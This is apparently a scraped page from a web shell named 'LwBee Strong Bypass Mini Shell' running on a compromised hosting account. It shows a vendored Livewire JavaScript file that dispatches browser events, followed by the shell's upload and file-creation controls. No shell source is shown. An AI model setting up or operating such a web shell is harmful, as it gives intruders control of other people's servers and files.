/home/u503560585/domains/mscm.me/public_html/vendor/livewire/livewire/js/util/dispatch.js
export function dispatch(eventName) {
    const event = document.createEvent('Events')

    event.initEvent(eventName, true, true)

    document.dispatchEvent(event)

    return event
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File